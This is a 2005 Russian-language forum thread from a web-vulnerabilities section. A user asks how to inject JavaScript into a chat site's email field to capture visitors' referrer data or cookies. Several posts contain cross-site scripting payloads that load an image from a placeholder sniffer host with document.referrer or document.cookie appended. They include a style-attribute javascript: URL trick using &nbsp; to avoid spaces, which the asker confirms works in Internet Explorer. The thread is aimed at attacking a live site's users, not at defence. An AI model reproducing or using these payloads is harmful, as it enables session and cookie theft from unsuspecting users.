Чаты Вставить Javascript в тег <a href....

Discussion in 'Веб-уязвимости' started by Dmitro, 7 Sep 2005.

  1. Dmitro

    Dmitro Elder - Старейшина

    Joined:
    11 Dec 2004
    Messages:
    105
    Likes Received:
    10
    Reputations:
    13
    Приветик уважаемые,
    Подскажите как вставить Javascript в тег "a"

    В одном чате форма ввода мыла пропускает любые кавычки. я вставляю снифер:

    style="background-color:ffffff; color:ffffff; font-size:1px; background-image:url(http://САЙТ/cgi-bin/СНИФЕР.jpg); background-repeat:no-repeat"

    Но снифер отображает текущего реферера, а мне нужен тот, с какого попали на эту страницу (инфа юзера)
    Надо вставить скрипт :
    <script>refer=document.referrer;</script>
    <script>img = new Image(); img.src = "http://САЙТ/cgi-bin/statistic/СНИФЕР.jpg?"+refer;</script>

    Что-то типо:
    <a href mailto: ..... style="
    background:url(javascript:img = new Image(); img.src = 'http://САЙТ/cgi-bin/statistic/СНИФЕР.jpg?'+document.referrer; )"

    Посмотрите, как правильно это записать, чёт не получается...

    З.Ы. или вместо document.referrer , можно document.cookie
    а ещё вариант, можно ли туда script src="Bla-bla.js" ?
     
    #1 Dmitro, 7 Sep 2005
    Last edited: 7 Sep 2005
  2. Dmitro

    Dmitro Elder - Старейшина

    Joined:
    11 Dec 2004
    Messages:
    105
    Likes Received:
    10
    Reputations:
    13
    гм...

    ?? ?? ?
    похоже сайт забросили..
     
  3. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    280
    Likes Received:
    8
    Reputations:
    -1
    Если в снифер включена переменнна HTTP_REFERER, то он сам покажет его.

    Сделай свой снифер... http://www.antixak.spb.ru/topics.php?tid=3

    А там разберешься )))
     
  4. Dmitro

    Dmitro Elder - Старейшина

    Joined:
    11 Dec 2004
    Messages:
    105
    Likes Received:
    10
    Reputations:
    13
    нет

    Переменная HTTP_REFERER есть, но она показывает текущего (адрес страницы на которой вставлен снифер) а надо поймать адрес страницы, с которой зашли на данную.

    Я так делал внедряя в страницу скрипт:

    <script>img = new Image(); img.src = "http://САЙТ/cgi-bin/СНИФЕР.jpg?"+document.referrer;</script>


    А вот как это сделать через <a href..... ????

    З.Ы. хороший у тя сайт
     
    #4 Dmitro, 8 Sep 2005
    Last edited: 8 Sep 2005
  5. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    <a href=lol.htm

    style=background:url("javascript:img=new&nbsp;Image();img.src='http://САЙТ/cgi-bin/СНИФЕР.jpg?'+document.referrer")>ssssss</a>
     
  6. Dmitro

    Dmitro Elder - Старейшина

    Joined:
    11 Dec 2004
    Messages:
    105
    Likes Received:
    10
    Reputations:
    13
    !

    Zadoxlik, УМНИЦА !!!
    чёш я такой лол не догадался про &nbsp; ?!
    А я голову ломал как без пробела....
    СПАСИБО !!
    Теперь всё работает, но только под IE, а опера ни-ни...